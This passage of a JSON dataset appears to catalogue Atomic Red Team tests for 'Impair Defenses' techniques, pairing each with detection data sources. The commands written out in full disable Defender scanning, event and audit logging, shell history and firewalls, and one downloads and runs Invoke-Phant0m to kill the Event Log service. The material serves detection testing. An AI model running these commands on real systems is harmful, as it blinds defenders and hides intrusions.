"Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n", + "cleanup": "Set-MpPreference -DisableIntrusionPreventionSystem $false;\nSet-MpPreference -DisableIOAVProtection $false;\nSet-MpPreference -DisableRealtimeMonitoring $false;\nSet-MpPreference -DisableScriptScanning 
$false;\nSet-MpPreference -EnableControlledFolderAccess Enabled;\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process termination", + "description": "A process was terminated.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "process" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": 
"Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + 
"macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with 
the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + null + ] + }, + { + "technique_id": "T1562.002", + "command_list": [ + 
"C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"Default Web Site\" /section:httplogging /dontLog:true\n", + "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\n$url = \"https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1\"\n$output = \"$env:TEMP\\Invoke-Phant0m.ps1\"\n$wc = New-Object System.Net.WebClient\n$wc.DownloadFile($url, $output)\ncd $env:TEMP\nImport-Module .\\Invoke-Phant0m.ps1\nInvoke-Phant0m\n", + "auditpol /set /category:\"Account Logon\" /success:disable /failure:disable\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\nauditpol /set /category:\"Detailed Tracking\" /success:disable\n", + "auditpol /clear /y\nauditpol /remove /allusers\n", + "wevtutil sl \"Microsoft-Windows-IKE/Operational\" /e:false\n", + "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\n" + ], + "commands": [ + { + "command": "C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"Default Web Site\" /section:httplogging /dontLog:true\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\n$url = \"https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1\"\n$output = \"$env:TEMP\\Invoke-Phant0m.ps1\"\n$wc = New-Object System.Net.WebClient\n$wc.DownloadFile($url, $output)\ncd $env:TEMP\nImport-Module .\\Invoke-Phant0m.ps1\nInvoke-Phant0m\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "auditpol /set /category:\"Account Logon\" /success:disable /failure:disable\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\nauditpol /set /category:\"Detailed Tracking\" 
/success:disable\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "auditpol /clear /y\nauditpol /remove /allusers\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "wevtutil sl \"Microsoft-Windows-IKE/Operational\" /e:false\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + }, + { + "command": "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\n", + "source": "atomics/T1562.002/T1562.002.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable Windows Event Logging" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.002", + "display_name": "Impair Defenses: Disable Windows Event Logging", + "atomic_tests": [ + { + "name": "Disable Windows IIS HTTP Logging", + "auto_generated_guid": "69435dcf-c66f-4ec0-a8b1-82beb76b34db", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).\nThis action requires HTTP logging configurations in IIS to be unlocked.\n\nUse the cleanup commands to restore some default auditpol settings (your original settings will be lost)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "website_name": { + "description": "The name of the website on a server", + "type": "String", + "default": "Default Web Site" + } + }, + "executor": { + "command": "C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:true\n", + "cleanup_command": "if(Test-Path \"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"){\n C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:false *>$null\n}\n", + "name": "powershell" + } + }, + { + "name": "Kill Event Log Service Threads", + 
"auto_generated_guid": "41ac52ba-5d5e-40c0-b267-573ed90489bd", + "description": "Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\n$url = \"https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1\"\n$output = \"$env:TEMP\\Invoke-Phant0m.ps1\"\n$wc = New-Object System.Net.WebClient\n$wc.DownloadFile($url, $output)\ncd $env:TEMP\nImport-Module .\\Invoke-Phant0m.ps1\nInvoke-Phant0m\n", + "cleanup_command": "Write-Host \"NEED TO Restart-Computer TO ENSURE LOGGING RETURNS\" -fore red\nRemove-Item \"$env:TEMP\\Invoke-Phant0m.ps1\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Impair Windows Audit Log Policy", + "auto_generated_guid": "5102a3a7-e2d7-4129-9e45-f483f2e0eea8", + "description": "Disables the windows audit policy to prevent key host based telemetry being written into the event logs.\n[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "auditpol /set /category:\"Account Logon\" /success:disable /failure:disable\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\nauditpol /set /category:\"Detailed Tracking\" /success:disable\n", + "cleanup_command": "auditpol /set /category:\"Account Logon\" /success:enable /failure:enable\nauditpol /set /category:\"Detailed Tracking\" /success:enable\nauditpol /set /category:\"Logon/Logoff\" /success:enable /failure:enable\n", + "name": "command_prompt", + "elevation_required": true + } + }, + 
{ + "name": "Clear Windows Audit Policy Config", + "auto_generated_guid": "913c0e4e-4b37-4b78-ad0b-90e7b25010f6", + "description": "Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "auditpol /clear /y\nauditpol /remove /allusers\n", + "cleanup_command": "auditpol /set /category:\"Account Logon\" /success:enable /failure:enable\nauditpol /set /category:\"Detailed Tracking\" /success:enable\nauditpol /set /category:\"Logon/Logoff\" /success:enable /failure:enable\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Disable Event Logging with wevtutil", + "auto_generated_guid": "b26a3340-dad7-4360-9176-706269c74103", + "description": "Wevtutil can be used to disable logs. \nNOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "log_name": { + "description": "Name of the log to be disabled", + "type": "String", + "default": "Microsoft-Windows-IKE/Operational" + } + }, + "executor": { + "command": "wevtutil sl \"#{log_name}\" /e:false\n", + "cleanup_command": "wevtutil sl \"#{log_name}\" /e:true\n", + "name": "command_prompt" + } + }, + { + "name": "Makes Eventlog blind with Phant0m", + "auto_generated_guid": "3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741", + "description": "Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "exe version of Phant0m", + "type": "Path", + "default": "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Phant0m.exe must exist on disk at specified location (#{file_name})\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", 
+ "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe\" -OutFile \"#{file_name}\" -UseBasicParsing\n" + } + ], + "executor": { + "command": "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\n", + "cleanup_command": "echo \"Sorry you have to reboot\"\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or 
script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1562.003", + "command_list": [ + "export HISTCONTROL=ignoreboth\nwhoami\n" + ], + "commands": [ + { + "command": "export HISTCONTROL=ignoreboth\nwhoami\n", + "source": "atomics/T1562.003/T1562.003.yaml", + "name": "Atomic Red Team Test - Impair Defenses: HISTCONTROL" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.003", + "display_name": "Impair Defenses: HISTCONTROL", + "atomic_tests": [ + { + "name": "Disable history collection", + "auto_generated_guid": "4eafdb45-0f79-4d66-aa86-a3e2c08791f5", + "description": "Disables history collection in shells\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "evil_command": { + "description": "Command to run after shell history collection is disabled", + "type": "String", + "default": "whoami" + } + }, + "executor": { + "command": "export HISTCONTROL=ignoreboth\n#{evil_command}\n", + "name": "sh" + } + }, + { + "name": "Mac HISTCONTROL", + "auto_generated_guid": "468566d5-83e5-40c1-b338-511e1659628d", + "description": "The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history \nand commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile \nso that it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "steps": "1. export HISTCONTROL=ignoreboth\n2. echo export \"HISTCONTROL=ignoreboth\" >> ~/.bash_profile\n3. ls\n4. 
whoami > recon.txt\n", + "name": "manual" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1562.004", + "command_list": [ + "netsh advfirewall set currentprofile state 
off\n", + "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v \"EnableFirewall\" /t REG_DWORD /d 0 /f\n", + "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\nnetsh advfirewall firewall set rule group=\"file and printer sharing\" new enable=Yes\n", + "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450 \n", + null, + "Copy-Item PathToAtomicsFolder\\T1562.004\\bin\\AtomicTest.exe -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", + "ufw disable\n", + "systemctl stop ufw\n", + "ufw logging off\n", + "ufw prepend deny from 1.2.3.4\nufw status numbered\n", + "echo \"# THIS IS A COMMENT\" >> /etc/ufw/user.rules\ngrep \"# THIS IS A COMMENT\" /etc/ufw/user.rules\n", + "echo \"# THIS IS A COMMENT\" >> /etc/ufw/ufw.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/ufw.conf\n", + "echo \"# THIS IS A COMMENT\" >> /etc/ufw/sysctl.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/sysctl.conf\n", + "echo \"# THIS IS A COMMENT\" >> /etc/default/ufw\ngrep \"# THIS IS A COMMENT\" /etc/default/ufw\n", + "tail /var/log/ufw.log\n" + ], + "commands": [ + { + "command": "netsh advfirewall set currentprofile state off\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v \"EnableFirewall\" /t REG_DWORD /d 0 /f\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\nnetsh advfirewall firewall 
set rule group=\"file and printer sharing\" new enable=Yes\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450 \n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": null, + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "Copy-Item PathToAtomicsFolder\\T1562.004\\bin\\AtomicTest.exe -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "ufw disable\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "systemctl stop ufw\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "ufw logging off\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "ufw prepend deny from 1.2.3.4\nufw status numbered\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/user.rules\ngrep \"# THIS IS A COMMENT\" /etc/ufw/user.rules\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - 
Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/ufw.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/ufw.conf\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/sysctl.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/sysctl.conf\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "echo \"# THIS IS A COMMENT\" >> /etc/default/ufw\ngrep \"# THIS IS A COMMENT\" /etc/default/ufw\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + }, + { + "command": "tail /var/log/ufw.log\n", + "source": "atomics/T1562.004/T1562.004.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify System Firewall" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.004", + "display_name": "Impair Defenses: Disable or Modify System Firewall", + "atomic_tests": [ + { + "name": "Disable Microsoft Defender Firewall", + "auto_generated_guid": "88d05800-a5e4-407e-9b53-ece4174f197f", + "description": "Disables the Microsoft Defender Firewall for the current profile.\nCaution if you access remotely the host where the test runs! 
Especially with the cleanup command which will re-enable firewall for the current profile...\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh advfirewall set currentprofile state off\n", + "cleanup_command": "netsh advfirewall set currentprofile state on >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Disable Microsoft Defender Firewall via Registry", + "auto_generated_guid": "afedc8c4-038c-4d82-b3e5-623a95f8a612", + "description": "Disables the Microsoft Defender Firewall for the public profile via registry\nCaution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v \"EnableFirewall\" /t REG_DWORD /d 0 /f\n", + "cleanup_command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v \"EnableFirewall\" /t REG_DWORD /d 1 /f\n", + "name": "command_prompt" + } + }, + { + "name": "Allow SMB and RDP on Microsoft Defender Firewall", + "auto_generated_guid": "d9841bf8-f161-4c73-81e9-fd773a5ff8c1", + "description": "Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.\nCaution if you access remotely the host where the test runs! 
Especially with the cleanup command which will reset the firewall and risk disabling those services...\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\nnetsh advfirewall firewall set rule group=\"file and printer sharing\" new enable=Yes\n", + "cleanup_command": "netsh advfirewall reset >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Opening ports for proxy - HARDRAIN", + "auto_generated_guid": "15e57006-79dd-46df-9bf9-31bc24fb5a80", + "description": "This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.\n\nreference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450 \n", + "cleanup_command": "netsh advfirewall firewall delete rule name=\"atomic testing\" protocol=TCP localport=450 >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Open a local port through Windows Firewall to any profile", + "auto_generated_guid": "9636dd6e-7599-40d2-8eee-ac16434f35ed", + "description": "This test will attempt to open a local port defined by input arguments to any profile", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "local_port": { + "description": "This is the local port you wish to test opening", + "type": "Integer", + "default": 3389 + } + }, + "executor": { + "command": "netsh advfirewall firewall add rule name=\"Open Port to Any\" dir=in protocol=tcp localport=#{local_port} action=allow profile=any", + "cleanup_command": "netsh advfirewall firewall delete rule name=\"Open Port to Any\" | Out-Null", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Allow Executable Through Firewall Located in 
Non-Standard Location", + "auto_generated_guid": "6f5822d2-d38d-4f48-9bfc-916607ff6b8c", + "description": "This test will attempt to allow an executable through the system firewall located in the Users directory", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_file_path": { + "description": "path to exe file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1562.004\\bin\\AtomicTest.exe" + } + }, + "executor": { + "command": "Copy-Item #{exe_file_path} -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", + "cleanup_command": "netsh advfirewall firewall delete rule name=\"Atomic Test\" | Out-Null\nRemove-Item C:\\Users\\$env:UserName\\AtomicTest.exe -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Stop/Start UFW firewall", + "auto_generated_guid": "fe135572-edcd-49a2-afe6-1d39521c5a9a", + "description": "Stop the Uncomplicated Firewall (UFW) if installed.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ufw is installed on the machine.\n", + "prereq_command": "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "ufw disable\n", + "cleanup_command": "ufw enable\nufw status verbose\n" + } + }, + { + "name": "Stop/Start UFW firewall systemctl", + "auto_generated_guid": "9fd99609-1854-4f3c-b47b-97d9a5972bd1", + "description": "Stop the Uncomplicated Firewall (UFW) if installed, using systemctl. 
\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if systemctl and ufw is installed on the machine.\n", + "prereq_command": "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "systemctl stop ufw\n", + "cleanup_command": "systemctl start ufw\nsystemctl status ufw\n" + } + }, + { + "name": "Turn off UFW logging", + "auto_generated_guid": "8a95b832-2c2a-494d-9cb0-dc9dd97c8bad", + "description": "Turn off the Uncomplicated Firewall (UFW) logging. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ufw is installed on the machine and enabled.\n", + "prereq_command": "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "ufw logging off\n", + "cleanup_command": "ufw logging low\nufw status verbose\n" + } + }, + { + "name": "Add and delete UFW firewall rules", + "auto_generated_guid": "b2563a4e-c4b8-429c-8d47-d5bcb227ba7a", + "description": "Add and delete a 